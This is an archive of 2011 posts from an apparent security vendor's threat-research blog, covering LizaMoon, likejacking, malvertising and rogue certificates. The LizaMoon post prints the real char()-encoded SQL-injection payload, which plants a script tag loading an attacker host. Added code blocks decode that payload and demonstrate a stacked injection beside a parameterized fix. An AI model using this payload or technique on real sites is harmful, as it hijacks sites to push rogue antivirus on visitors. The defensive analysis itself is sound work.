
March 2011 Posts

Update on LizaMoon mass-injection and Q&A
Posted: 31 Mar 2011 01:03 PM

The LizaMoon mass-injection campaign is still ongoing, and more than 500,000 pages have a script link to lizamoon.com according to preliminary Google Search results. We have also been able to identify several other URLs that are injected in exactly the same way, so the attack is even bigger than we originally thought. All in all, a search on Google returns more than 1,500,000 results that have a link with the same URL structure as the initial attack. Google Search results aren't always a great indicator of how prevalent or widespread an attack is, since Google counts each unique URL or page rather than each domain or site, but they do give some indication of the scope of the problem if you look at how the numbers go up or down over time.

Additional injected URLs

Here's a list of domains that we have identified so far (with help from blog comment posters; thanks for that guys!).

 


List updated: 4/1/2011 12:16pm PT

 

The domain stats-master111.info was registered on October 21, 2010, which could mean the first attack happened then, but we don't have any evidence of that. The first confirmed case that we know of is from December 2010, but we didn't make the connection to LizaMoon until today. The last domain, milapop.com, was registered today.

 

SQL Injection

We were able to find more information about the SQL Injection itself (thanks Peter) and the command is par for the course when it comes to SQL Injections. Here's one example:

 

+update+Table+set+FieldName=REPLACE(cast(FieldName+as+varchar(8000)),cast(char(60)%2Bchar(47)
%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)
%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)
%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)
%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)
%2Bchar(115)%2Bchar(116)%2Bchar(97)%2Bchar(116)%2Bchar(115)%2Bchar(53)%2Bchar(48)%2Bchar(46)
%2Bchar(105)%2Bchar(110)%2Bchar(102)%2Bchar(111)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)
%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)
%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)
+as+varchar(8)))--

 

More information is available over on Stackoverflow.com.
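To turn the encoded statement above back into readable SQL, here is a small decoder added for this post (it is not code from the post or from Websense): it URL-decodes the query-string form (a `+` is a space, `%2B` a literal `+`) and folds each `char(N)+char(N)+...` chain into a quoted literal, so a DBA can see at a glance which string the REPLACE call searches for and what it substitutes. The constant is the statement quoted above, joined into one line.

```python
import re
from urllib.parse import unquote_plus

# The URL-encoded UPDATE statement quoted above, joined into one line exactly as
# shown in the post (line wrapping removed, nothing else changed).
LIZAMOON_PAYLOAD = (
    "+update+Table+set+FieldName=REPLACE(cast(FieldName+as+varchar(8000)),cast(char(60)%2Bchar(47)"
    "%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)"
    "%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)"
    "%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)"
    "%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)"
    "%2Bchar(115)%2Bchar(116)%2Bchar(97)%2Bchar(116)%2Bchar(115)%2Bchar(53)%2Bchar(48)%2Bchar(46)"
    "%2Bchar(105)%2Bchar(110)%2Bchar(102)%2Bchar(111)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)"
    "%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)"
    "%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)"
    "+as+varchar(8)))--"
)

# One or more char(N) calls joined with '+', i.e. a string built one character at a
# time. The leading \b keeps the pattern from matching inside 'varchar(8000)'.
CHAR_CHAIN = re.compile(r"\bchar\(\d+\)(?:\+char\(\d+\))*", re.IGNORECASE)
SCRIPT_SRC = re.compile(r"<script\s+src=['\"]?([^\s'\">]+)", re.IGNORECASE)


def _chain_to_text(chain):
    """Turn 'char(60)+char(47)' into '</' by mapping each code point to its character."""
    return "".join(chr(int(n)) for n in re.findall(r"\d+", chain))


def _chain_to_literal(match):
    # Emit a T-SQL string literal, doubling any embedded single quote.
    return "'" + _chain_to_text(match.group(0)).replace("'", "''") + "'"


def decode_payload(encoded):
    """URL-decode the query-string form and replace every char() chain with a quoted literal."""
    sql = unquote_plus(encoded).strip()
    return CHAR_CHAIN.sub(_chain_to_literal, sql)


def char_literals(encoded):
    """Return just the strings hidden in char() chains, in order of appearance."""
    return [_chain_to_text(m) for m in CHAR_CHAIN.findall(unquote_plus(encoded))]


def script_sources(text):
    """List the src URLs of any <script> tags, in decoded SQL or in stored page content."""
    return SCRIPT_SRC.findall(text)


if __name__ == "__main__":
    decoded = decode_payload(LIZAMOON_PAYLOAD)
    print(decoded)
    print(char_literals(LIZAMOON_PAYLOAD))
    print(script_sources(decoded))
```

The same `script_sources` check can be run over rows exported from a database to find which fields already carry a tag of this shape.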

 

Injected code

Here is the content of an example ur.php file. The content isn't even obfuscated, which is somewhat unusual. All the code does is redirect to a rogue AV site. We've seen the scripts change over time to redirect to several different rogue AV sites:

 


What happens to the user?

We wrote in an earlier post that the payload site doesn't work properly, but further testing shows that it does and we created a video showing what happens if a user visits a website that contains the injected code. The video is available at the end of this post. The user only gets the malicious code once per IP address, so if you've already visited the site you won't get the code again. This is something we see often in attacks, especially in exploit kits.

 

The Rogue AV software that is installed is called Windows Stability Center and the file that is downloaded is currently detected by 13/43 anti-virus engines according to VirusTotal.

The software then displays a warning that there are lots of problems on your PC. To fix them you have to pay for the full version of the application. Very traditional rogue AV scam. Dancho Danchev has some more information on his blog.

Where are users coming from?

We looked at reports of traffic to lizamoon.com as indicated by data collected by the Websense Threatseeker Network and here's a graph of where those users are located.


So what about iTunes?

We received blog comments from our readers (keep them coming, we read them all!) and some were critical of our use of iTunes in the title of the previous post and of how we stated that iTunes URLs had been compromised but the script had been neutered by Apple. All of what we stated was technically correct, but perhaps we didn't make it clear enough.

 

Every time there's a mass-injection like this, and there really hasn't been anything this big before, we try to identify larger systems and sites that have been affected to give some indication of how wide the attack has spread. And there are few systems out there bigger than iTunes, so when we saw that content on itunes.apple.com contained the injected link we wanted to make people aware of that, even if the script didn't work. It seems that some readers weren't too happy about that and argued that we could also say that Google Search was compromised because it also shows the injected code in search results. We don't really agree with that, but perhaps we shouldn't have highlighted it the way we did.

 

Questions & Answers about the LizaMoon mass-injection

 

Q: Why is this called LizaMoon?
A: One of the first domains we saw involved in this campaign, created on March 25, 2011, was lizamoon.com.

 

Q: How many pages have been affected by this?
A: With the complications of search algorithms and how they count results, it's hard to say. Google Search returns more than 1.5 million results. A Bing Search returns about 900,000 results, but the same reservation about their algorithm and how they count results applies. We believe the number of sites infected is significantly smaller.

 

Q: How does the script get added to the compromised sites?
A: We're still looking into that. We know that it uses SQL Injection to do it and not XSS as some of our blog readers have suggested.

 

Q: How do you know it's using SQL Injection?
A: We have been contacted by people who have seen the code in their Microsoft SQL databases. Initially we only received reports of users running Microsoft SQL Server 2000 and 2005 being hit but since then we have also received reports of websites using Microsoft SQL Server 2008 being injected as well.

 

Q: Could this mean that there's a vulnerability in Microsoft SQL Server 2000 and 2005?
A: No. Everything points to this being a vulnerability in a web application. We don't know which one(s) yet, but SQL Injection attacks work by issuing SQL commands in unsanitized input to the server. That doesn't mean it's a vulnerability in the SQL Server itself; it means that the web application isn't filtering input from the user correctly.
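As an added illustration of the answer above (not code from the post or from Websense), here is the difference between splicing user input into SQL text and binding it as a parameter, using SQLite in place of Microsoft SQL Server. The table, page bodies and stacked input are constructed for the demo; `executescript` stands in for a driver that runs several statements in one request, and the appended UPDATE uses a plain string literal rather than the char() chains seen in the wild, because `+` is arithmetic in SQLite.

```python
import sqlite3

# The line the post says LizaMoon inserts into compromised pages.
INJECTED_TAG = "<script src=hxxp://lizamoon.com/ur.php></script>"

# Constructed input for the demo: the expected page id followed by a second
# statement of the kind described above, which rewrites every stored page body.
STACKED_INPUT = (
    "1; update pages set body = REPLACE(cast(body as varchar(8000)), '</title>', "
    "'</title>" + INJECTED_TAG + "')--"
)


def fresh_db():
    """In-memory table with two constructed page bodies."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "create table pages(id integer primary key, body text);"
        "insert into pages(body) values "
        "('<html><head><title>Home</title></head><body>Hi</body></html>');"
        "insert into pages(body) values "
        "('<html><head><title>About</title></head><body>Us</body></html>');"
    )
    return conn


def lookup_vulnerable(conn, page_id):
    """Splices the raw input into the SQL text. Returns the number of rows the
    supposedly read-only lookup modified (anything other than 0 is a red flag)."""
    before = conn.total_changes
    # executescript runs every statement it finds, like a driver that allows
    # stacked queries; the input is parsed as SQL, so the appended UPDATE runs.
    conn.executescript("select body from pages where id = %s;" % page_id)
    return conn.total_changes - before


def lookup_parameterized(conn, page_id):
    """Binds the input as a value: it is compared against id, never parsed as SQL."""
    row = conn.execute("select body from pages where id = ?", (page_id,)).fetchone()
    return row[0] if row else None


def injected_pages(conn):
    """Ids of pages whose body now carries the injected tag; the check a site
    owner would run against their own database after an incident like this."""
    rows = conn.execute(
        "select id from pages where body like ? order by id", ("%" + INJECTED_TAG + "%",)
    )
    return [r[0] for r in rows]


if __name__ == "__main__":
    db = fresh_db()
    print("rows changed by vulnerable lookup:", lookup_vulnerable(db, STACKED_INPUT))
    print("pages carrying the tag:", injected_pages(db))
    db = fresh_db()
    print("parameterized lookup result:", lookup_parameterized(db, STACKED_INPUT))
    print("pages carrying the tag:", injected_pages(db))
```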

 

Q: What happens when I visit a site that contains the injected script?
A: Your PC will get redirected to a rogue AV site, displaying fake information about your PC being infected.

 

Q: Will I get redirected over and over again if I visit a compromised site?
A: No, the script only redirects you once.

 

Q: When will the LizaMoon attack be over?
A: Not anytime soon. We're still seeing references to Gumblar, which was a mass-injection attack found in 2009.

 

Video

Below is a video showing what happens when a user visits a site that has the LizaMoon script injected.

Patrik Runald

LizaMoon mass injection hits over 226,000 URLs (was 28,000)
Posted: 29 Mar 2011 10:15 AM

Websense Security Labs and the Websense Threatseeker Network have identified a new malicious mass-injection campaign that we call LizaMoon. Websense customers are protected with the Advanced Classification Engine.

 

Updated information

We have updated information about the LizaMoon injection available here:

http://community.websense.com/blogs/securitylabs/archive/2011/03/31/update-on-lizamoon-mass-injection.aspx

 

LizaMoon

The LizaMoon mass-injection is a SQL injection attack that inserts the following line into the code of the page:

 

<script src=hxxp://lizamoon.com/ur.php></script>

 

According to a Google Search, over 28,000 URLs (updated: 226,000) have been compromised. This includes several iTunes URLs, as you can see below:

And here is the injected code at one of those iTunes URLs:

The way iTunes works is that it downloads RSS/XML feeds from the publisher to update the podcast and list of available episodes. We believe that these RSS/XML feeds have been compromised with the injected code. The good thing is that iTunes encodes the script tags, which means that the script doesn't execute on the user's computer. So good job, Apple.

 

The URL that is injected is unavailable right now, but the server is still up and running, so that could change at any time. While it was up, the script contained simple JavaScript code that redirected the user to a well-known Rogue AV site: hxxp://defender-uqko.in. That site is also unavailable right now, so we don't have the actual binary analysis information available yet.

 

The domain lizamoon.com was registered three days ago with clearly fake information:

We'll keep monitoring this mass-injection attack and provide updated information as it's available.

 

UPDATE1: A Google Search now returns over 226,000 results. Do note that this is a count of unique URLs, not infected hosts. Still, it makes it one of the bigger mass-injection attacks we have ever seen.

UPDATE2: We have been monitoring the attack since it came out and noticed that the number of compromised URLs is still increasing: 380,000 URLs so far. Moreover, domains other than lizamoon.com have started to be involved.

 

Patrik Runald

Italian model exposed in Facebook clickjacking attack
Posted: 28 Mar 2011 11:51 PM

The mere mention of anything with a sex connotation on Facebook almost always begets some major activity, with people wanting to know more. As a result, whatever the attack vector or channel might be is propagated, and the attacker is sure to get some response.

 

In this example a Facebook click-jacking attack jumped on the bandwagon of Italian model Marika Fruscio's unfortunate incident with a wardrobe malfunction on live TV. The title of the scam on Facebook was "The beautiful Marika Fruscio shows her breasts on Italian TV!", which almost sounds like it was staged as opposed to an accident. Whatever the theory, the interesting part of this attack is what happens when someone clicks on the provided link to watch the embedded video.

 

The attack seems harmless: upon clicking the link, the user is directed to another page where they can view the video. While this is happening, the user's account is being exploited to post the video on their homepage for further distribution. The user is also added to the list of those who like the video, consequently encouraging others to view it. The series of steps involved is shown below.

 

An infected account shows the advert as being liked either by a friend or contact within your Facebook account:

The user is then directed to the page below to view the video. Unknown to the user, there are hidden elements and iframes within the HTML code, located at the Play button, which directly access the user's 'like' option within Facebook. These hidden elements are where the magic of click-jacking, or shall we say like-jacking, happens.

 

Innocent-looking page as seen by the user:

Riddled page with hidden elements and iframe superimposed on the Play button and various parts of the page:

On clicking the Play button, two events take place. The first is that the user's Facebook account accepts 'liking' the video, with the video being posted on their wall as a result. The second is that the video plays Marika Fruscio's wardrobe malfunction on live TV. 

 

Below is the screen the user is presented with if they are not already logged in to Facebook:

The compromised account then displays a video link on the user's wall encouraging others to view this.

There are several motives for this type of attack, and in this instance, although there is nothing apparently malicious, it brings to mind the elaborate ploy where an attacker uses this means to earn some money. Pay-per-click springs to mind, as attackers behind these scams usually get the user to click on hidden links in order to get many hits, which then rewards the attacker with money.

 

Further analysis using our in-house tools on spontour.net shows the various links and how they are interconnected.

To protect yourself from attacks such as these, and also from posts like this being posted on your wall, try our free Defensio Facebook app.


Anonymous

Spotify application serves malicious ads
Posted: 25 Mar 2011 10:25 AM

Today it was reported that Spotify, the popular streaming music service, displayed malicious ads to users of their Free version. The ads lead to websites that used the Blackhole Exploit Kit to infect users with the Windows Recovery fake AV application. Our Advanced Classification Engine has full coverage for the Blackhole kit and protected users proactively. The first report we have of a malicious ad being displayed is from around 11:30 GMT on March 24.

 

Malvertising is nothing new; we've seen it affect large websites in the past, but this case is slightly different. In the past the malicious ads have been displayed as part of a website and viewed with the browser. In this case the malicious ad is actually displayed inside the Spotify application, as in the picture below (note that the ad below is not malicious, it's just an example):

The application renders the ad code and runs it as if it were run inside a browser. This means that the Blackhole Exploit Kit works perfectly fine, and it's enough for the ad to be displayed to you in Spotify to get infected; you don't even have to click on the ad itself. So if you had Spotify open but running in the background, listening to your favorite tunes, you could still get infected. Seems like free does come at a price after all. Spotify removed all third-party ads in the free version while they did their investigation, but the ads have now been turned back on again.

 

Once the ad was displayed, the computer would connect to hxxp://uev1.co.cc where the exploit kit tries several vulnerabilities to infect the user. The IP address where the malicious content is hosted is well-known to us and we have seen it host the same exploit kit on several other domains:

Again, it was enough for the ad to just be displayed in the Spotify application, the user didn't have to click on the ad or do anything else. One of the vulnerabilities the exploit kit uses is a vulnerability in Adobe Reader/Acrobat. The kit uses a heavily obfuscated PDF file to make the infected computer download the fake AV software. Here are the VirusTotal reports for the PDF and the fake AV file. Once the fake AV is launched it connects to the following domains to download additional content, including a rootkit which is a packed version of TDSS:

 


 

Here's a screenshot of what the application looks like on the user's PC:

One interesting thing is that we have only seen reports from infected users in the UK. This could mean that the attack only targets UK users or it's just that we haven't received reports from users anywhere else. If you are outside of the UK and have been affected by this, please send us a note using the comments feature below.

 

UPDATE: We got a tweet from our friends at Avast who report this breakdown of users who have seen the malicious ad: Sweden 59%, UK 40% and other countries 1%. Thanks Avast, appreciate the info!

 

Thanks to Adam Hiscocks for providing information and samples to us.


Patrik Runald

Rogue SSL certificates issued by Comodo
Posted: 24 Mar 2011 03:58 PM

SSL certificates are used to validate the identity of a Web site to users. Yesterday Comodo, a certificate vendor, announced that nine SSL certificates had been bought and issued for the following domains:

 

  • mail.google.com (Gmail)
  • login.live.com (Hotmail and Microsoft Live services)
  • www.google.com
  • login.yahoo.com (three different certificates)
  • login.skype.com
  • addons.mozilla.org (Firefox extensions)
  • "Global Trustee"

 

Comodo added the rogue certificates to their Certificate Revocation List (CRL) on the evening of March 15, 2011, and Microsoft, Mozilla and other vendors have released updates to their browsers since then.

 

What does this mean?

The rogue SSL certificates could have been used to set up Web sites that provide fake login services for the services listed above (Gmail, Yahoo, Live, Skype etc). By doing that, whoever was behind this could steal user names and passwords even though the traffic was encrypted with SSL, and the user wouldn't know anything was wrong. With the updated CRL, the user would get a warning when visiting a site using any of the rogue certificates and would hopefully not enter any credentials.

 

Comodo states in their report that a user account at one of their affiliate partners was compromised and used to issue the rogue certificates. The attacker used several IP addresses when doing this, but mainly used an IP address from Iran. According to the investigation done by Comodo the attacker was very quick to issue the certificates, knew exactly which domains to issue them for, and didn't waste any time when doing this.

 

How do Websense products protect users?

Users who have Windows Update enabled will receive the updated CRL automatically for Internet Explorer, and if you have automatic updates enabled for any other browser it will download the CRL as well. Our products also have the ability to check the validity of an SSL certificate, and the benefit of doing that is that the product does it for all users, regardless of which browser they use and whether they have the update or not. This feature is not enabled by default in Websense Content Gateway, so follow the steps below to enable CRL verification.

If unsure we recommend that you contact your Technical Account Manager to discuss how this change will affect the user experience in your particular environment.

 

  1. Log on to Content Gateway Manager.
  2. Go to Configure > My Proxy > Basic > Features > HTTPS, and enable HTTPS Protocol.
  3. Go to Configure > My Proxy > Basic > Restart and select Restart to enable the SSL Inspection (SSL Manager).
  4. Go to Configure > My Proxy > SSL > Validation > General and configure the page as follows:
    • Select Enable the certificate verification engine
    • Clear Deny certificates where the common name does not match the URL (see below)
    • Verify that Check certificate revocation by CRL is selected
    • Click Apply
  5. Optional step: Select the Verification Bypass tab and make sure the following options are selected.
    Important note: This is an optional step that depends on your organization's security policy. If you choose this option, users will have the ability to continue browsing to dangerous Web sites with potentially rogue SSL certificates, so if you don't wish to give users this choice, skip this step.
    This will prompt the user with a warning message informing them that the certificate is invalid, but they will have the option to click Continue to visit the page.
  6. Select the Revocation Settings tab and make sure that the automatic download of new CRL lists is enabled:


If the automatic download was disabled, we recommend that you force an update to make sure the latest CRLs are downloaded. If the download was already enabled, you don't have to do this, as the updated CRL from Comodo was released on March 15 and your Websense product will already have it installed. Regardless of whether you have CRL verification turned on or not, the Advanced Classification Engine will scan the content from any site, including those using the rogue SSL certificates, as long as you have SSL inspection turned on, and block all malicious code.


Patrik Runald

Rustock - 7 days later
Posted: 22 Mar 2011 06:51 PM

RIP Rustock botnet!  Today marks exactly one week since Rustock, one of the largest spam generator botnets, was taken down by the Microsoft digital crime unit and US federal law enforcement agents.

 

Rustock had approximately 250,000 bots or more and, until last Wednesday, was one of the biggest known bot networks. The bot's author had implemented certain stealth techniques to hide his invention as deep as possible in victims' Windows systems and to make it undetectable by various AV engines. One of the techniques used was not to send spam emails for a certain amount of time after infection took place.

 

Rustock was not the first botnet to be taken down. The same fate befell botnets such as Srizbi in 2008 and Waledac in 2010. In this particular case, several third parties were involved and worked with Microsoft to take down this botnet, as it was affecting their businesses. Typical Rustock spam emails advertised fake pharmaceutical products.

 

The graph below shows a steep drop in connections to one of the Websense servers on Wednesday the 16th and in the following days, coinciding with Microsoft's annihilation of the botnet a week ago.

At the same time Microsoft applied proactive measures to prevent the reregistration of domains for C&C.  The corporation is working in cooperation with CN-CERT to block the registration of domains in China which they think could be generated by Rustock.

 

As history shows, Rustock is not the first botnet to be taken down and won't be the last. Websense Security Labs continues to monitor the global spam situation and to provide the best protection for our customers.

 


Artem Gololobov

Zbot and Black Hole Exploit Kit "all in one" fake Facebook notification Emails
Posted: 18 Mar 2011 06:41 AM

Websense® Security Labs™ Threatseeker® Network has detected a new malicious email campaign that masquerades as originating from Facebook. The campaign appears to actually originate from the Cutwail/Pushdo spam bot. This time round, the cyber criminals employ two attack vectors: social engineering and an exploit kit. Both end up with the Zeus/Zbot Trojan installed on the targeted machines.

 

Websense customers are protected from this attack with our Advanced Classification Engine analytics, our suite of technologies within TRITON.

 

Here is an example of a malicious email in Spanish:

The malicious email is spoofed to appear to come from Facebook.com and says: "Hi, someone loves your photo comments, please click on the link to see all comments". It provides a fake URL disguised as an official Facebook link. Once clicked, the user is redirected to an attack page and is prompted to download and run an "update" from Facebook. The "update" file is a Zeus/Zbot Trojan variant. At the time of writing, the file had only a 7% detection rate.

The attack isn't over yet. While the fake Facebook page loads, the user's machine is attacked silently with several exploits in the background. The exploits are sent via an iframe contained in the fake Facebook attack page. This process happens silently when the attack page is loaded. The exploits are loaded from one of the most prevalent exploit kits today - the Blackhole exploit kit. Any successful exploitation results in the Zeus/Zbot Trojan installed silently on the user's machine.

 

Here is an example iframe from the Facebook attack page that points to the Blackhole exploit kit:

New 0-day Vulnerability in Adobe Flash Player (CVE-2011-0609)
Posted: 15 Mar 2011 07:35 AM

Websense® Security Labs™ has received reports of a new zero-day exploit that targets Adobe Flash Player (CVE-2011-0609). The vulnerability can potentially allow an attacker to execute malicious code on a targeted machine and has been spotted in a limited number of targeted attacks. The targeted attacks employed an Excel file with an embedded vulnerable Flash file (.swf) with the aim of executing unsolicited malicious code on the targeted machines.

The security advisory released by Adobe marks the vulnerability as "critical" and it affects all the latest versions of Adobe Flash Player. The vulnerability also exists in Adobe Acrobat Reader and Adobe Acrobat Reader X as the vulnerable DLL file "authplay.dll" is also shipped with those versions. However, Adobe Acrobat X can mitigate this kind of vulnerability from executing, thanks to its sandbox functionality - so in that respect, it's highly recommended to upgrade to that version if possible.

 

Adobe plans to patch this vulnerability with an update to Flash Player that will be available for all platforms on the 21st of March.

 

Currently, we're not seeing any widespread attacks in the wild that utilize this vulnerability, largely because the exploit details aren't publicly disclosed, but we're monitoring the situation and will keep you updated as related events unfold.


Elad Sharf

Japanese disaster - ammo for cyber arsenal
Posted: 15 Mar 2011 06:54 AM

It's no secret that criminals try to use huge disasters to their benefit to make some cash, and this time is no exception! We have been able to track several black hat methods used to convince people to "help" Japan's disaster-affected population. The set of techniques is not new and usually involves:

 

  • SEO poisoning
  • Rogue AV (anti-virus)
  • Phishing emails asking for donation
  • Malicious files attached to emails claiming to be legitimate documents
  • Facebook apps with CPA (cost per action) lead surveys

 

Websense customers are protected from such attacks with our Advanced Classification Engine analytics, our suite of technologies within TRITON.

 

Black Hat SEO

SEO poisoning was used within minutes after the first wave hit the Japanese coast. Using common search terms like "japan earthquake news 2011" to look for the latest information in search engines brings up all sorts of results, including malicious sites hosting fake AV.

 

Looks like a benign search result:

Following a link, the victim lands at a website with a slightly modified version of a redirection to fake AV. In previous campaigns such websites directly hosted the fake AV; nowadays they redirect to it.

Rogue AV

When redirected via a "CLICK HERE" button, a warning appears stating that your computer might already be infected:

Whether the "Cancel" or "OK" button is clicked, a rogue Windows-style anti-virus pops up, even though it is running on a Linux OS.

Phishing Email

Below is a very simple, nicely written and almost legitimate-looking email which asks the recipient for a donation on behalf of Humanitarian Care Japan. Notice this little detail: the "reply to:" address is a free mail address and completely different from the sender's address.

Malicious Email

Another type of e-mail used is the malicious e-mail, or the e-mail with links leading to malicious content. One like this was used in a targeted attack: it provides information about the nuclear crisis in Japan and has a document attached called "Understanding Japan's Nuclear Crisis.doc", which surprisingly enough has very low coverage (5/43) on VirusTotal. Also, as you can see from the message source, it was sent from a free mail account.

 

Facebook apps with CPA lead survey

And the last, but not least, attack vector is through social networks. For example, the Websense Threatseeker Network has identified a set of Web sites that entice users to watch a video about the latest disaster events in Japan. As you can see in the picture below, the sites involved are registered under the .info TLD; "D1" stands for "Registered for 1 day". Instead of getting a movie, users are redirected to a Facebook application installation page. The application asks for permission to post on the user's wall.

The scam application has different names such as "RemoteViews", "Collect", "Consumer" and others. Once clicked, it asks the victim to fill in a survey to unlock pictures of people who viewed the victim's profile:

It also leaves a post on the victim's wall with a link to this application:

We have already discussed CPA (cost per action) leads in our previous blog about Viral Facebook Applications as well as most techniques listed in this blog.  

 

In conclusion, we can see how, again and again, such disastrous events give cybercriminals a lot of "ammo" for their "arsenal" of malicious activities.

Artem Gololobov

This Month in the Threat Webscape - February 2011
Posted: 07 Mar 2011 09:44 AM

Month of February

Major Hits

Two major compromises affected the UK in February. The Web sites for BBC 6 Music and BBC Radio 1xtra were compromised and were serving a malicious iFrame leading to the Phoenix exploit kit. In addition, AutoTrader, eBay, the London Stock Exchange, Myvue, and many other high-profile sites were hosting ads from an ad provider called Unanimis. This malvertising campaign occurred over a weekend, and thus did not affect as many people as it might have on work days. The advertisement had an iFrame to another exploit kit that used attacks similar to the Black Hole exploit kit.

 

Night Dragon attacks were also active.  Night Dragon targets U.S. oil, gas, and petrochemical companies. It steals proprietary and confidential information from executives, by using a combination of social engineering, Remote Administration Tools (RATs), and SQL injection attacks to gain access to external and internal hosts inside companies. It is believed that the attackers are based in China, which may be why the class of attacks is called Night Dragon.

 

A leaderless and anarchical Internet group, Anonymous, declared war against HBGary Federal when their head of security services said he had uncovered and planned to release the identities of Anonymous’ leaders using social networking sites. Anonymous broke into HBGary Federal’s systems and released their internal confidential information. Whoops.

 

Several thousand small businesses and personal sites fell victim to an error by the U.S. Department of Homeland Security and Department of Justice. These departments announced the seizure of several domains that were involved in the distribution of child pornography. In addition to closing those domains, they managed to shut down a popular shared domain that belongs to a free DNS provider, which resulted in 84,000 other web sites, subdomains of mooo.com, being disconnected. After the incident, several thousand site owners were able to witness a banner with a message stating that advertisement and distribution of child pornography is illegal.

 

Researchers discovered a way of accessing passwords stored on the iPhone and iPad. The method requires physical access to the device and takes no more than 6 minutes, which is enough time to carry out the procedure on a stolen or unattended device.

Gambling addiction did not benefit the hacker who admitted stealing $12m worth of gaming chips. After gaining unauthorized access to the servers of game developer Zynga by posing as one of the site administrators, the hacker transferred 400 billion gaming chips into his fake Facebook account. Ashley Mitchell was trying to sell his illegal gain for about £180,000.

A major incident happened to Australian cosmetics retailer Lush: hackers managed to access and steal the company's entire customer database along with customers' credit card details. The company had not been aware of the vulnerability, which was caused by not keeping the Web site updated, and could not determine how long the breach had been going on.

Two major online dating sites, PlentyOfFish.com and eHarmony, were hacked, and the personal and password information of their users was believed to be exposed. Ethical and legal questions were raised regarding the companies' compensation of those who submit such third-party security alerts.

A high-profile victim of malware attacks this month was Nasdaq. According to Nasdaq, there was no evidence that customer information had been exposed by the breach. Investigations continue to assess whether the anomalies in the stock market last summer were caused by stock exchange subversion activities.

Web 2 dot uh oh

A couple of Facebook security holes were discovered in February. The first was an authentication flaw that allows a malicious Web site to disguise itself as another, legitimate site. This happens only when the malicious Web site is visited while the user is logged into Facebook. The second is yet another saga of clickjacking attacks, this time targeting Italian, Japanese, and Cyrillic-speaking audiences. Promises of interesting and perhaps controversial videos led Facebook users into clicking the "Like" button.

It's always interesting to see who viewed your Facebook profile. That this statement holds true is proven by the fact that the same scam is used over and over again to seduce users into adding shady applications that promise to do exactly this, but instead lead to survey scams. You don't even have to be a developer to carry out these survey scams, because they are usually built using a pre-defined toolkit that sells for only $25 or even less.

Something you know and something you have are the secret ingredients of Google's 2-factor authentication process, which is intended to make any attempt to break into a Google account next to impossible. This should serve users with weak passwords well, because a required one-time password is sent via text message or voice call whenever a user enters his or her password. The feature will be available for all of Google's free online services.

The data war between Facebook and Google was the headline towards the end of February. After an update to Google's Nexus S Android phone, Facebook contacts no longer appear integrated with the Android Contacts app. This standoff is unlikely to be resolved until Facebook introduces an API similar to Gmail's.

Browser and friends

Adobe delivered a group of patches in the early part of February. Although not the top threat source, PDF exploits are still a favorite of cyber criminals. In the security update for Adobe Reader and Acrobat, 29 vulnerabilities were fixed, 23 of which could cause the application to crash and potentially allow an attacker to take control of the affected system. Meanwhile, 13 vulnerabilities were patched in Adobe Flash Player and 21 vulnerabilities were patched in Adobe Shockwave Player.

As the application most targeted by exploits, Java also received a security update this month. Oracle patched 21 Java security holes; 19 of these vulnerabilities may be remotely exploitable.

Google has updated Chrome to 9.0.597.107 with 19 vulnerabilities fixed.

 

Also drawing attention is Pwn2Own 2011, which will be held in March in Vancouver. The contest will reward the hacker who successfully hacks IE, Safari, Firefox, or Chrome on a 64-bit system running the latest version of either OS X or Windows 7. Chrome was the only one that survived last year; who will be the survivor this year?

Microsoft

On Patch Tuesday in February, Microsoft released twelve security bulletins. Three of them have a maximum severity rating of Critical. The first, MS11-003, resolves four vulnerabilities in Internet Explorer that could allow remote code execution when a user visits a specially crafted Web page. The second, MS11-006, patches a vulnerability in Windows Shell Graphics Processing (CVE-2010-3970) that was publicly disclosed last month. The last critical update, MS11-007, resolves a privately reported vulnerability in the Windows OpenType Compact Font Format (CFF) driver. The other nine bulletins are rated "Important". The patches cover the Microsoft Windows operating system, the Internet Explorer browser, the Microsoft Office productivity suite, Visual Studio, and IIS. However, the recently disclosed cross-site scripting vulnerability in MHTML was still not fixed in February.

In addition to the twelve security bulletins, Microsoft also released an important but non-security advisory (967940) related to Windows Autorun. The update delivers a package that restricts AutoPlay functionality to CD and DVD media only, in order to help protect customers from attacks that execute arbitrary code through Autorun when a USB flash drive is inserted, when a network share is mapped, or when any other non-CD media containing a file system with an Autorun.inf file is attached.
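The advisory above changes what Autorun is allowed to do for non-optical media; a defender will want to confirm that a given machine actually ended up restricted. The script below is an added example written for this roundup, not code from Microsoft or from the advisory. It reads the NoDriveTypeAutoRun policy value (a bit mask in which each set bit disables Autorun for one drive type) from both the machine and the user hive and reports which drive types are still allowed to run Autorun. The bit-to-drive-type mapping and the hive paths are taken from Microsoft's documentation of that value; the function names and output layout are this example's own.

```powershell
# Added example (not part of the Websense post or of advisory 967940):
# report whether Autorun is restricted to CD/DVD media on this machine.
#
# NoDriveTypeAutoRun is a bit mask; a set bit DISABLES Autorun for that drive type.
# Bit values as documented by Microsoft for this policy value:
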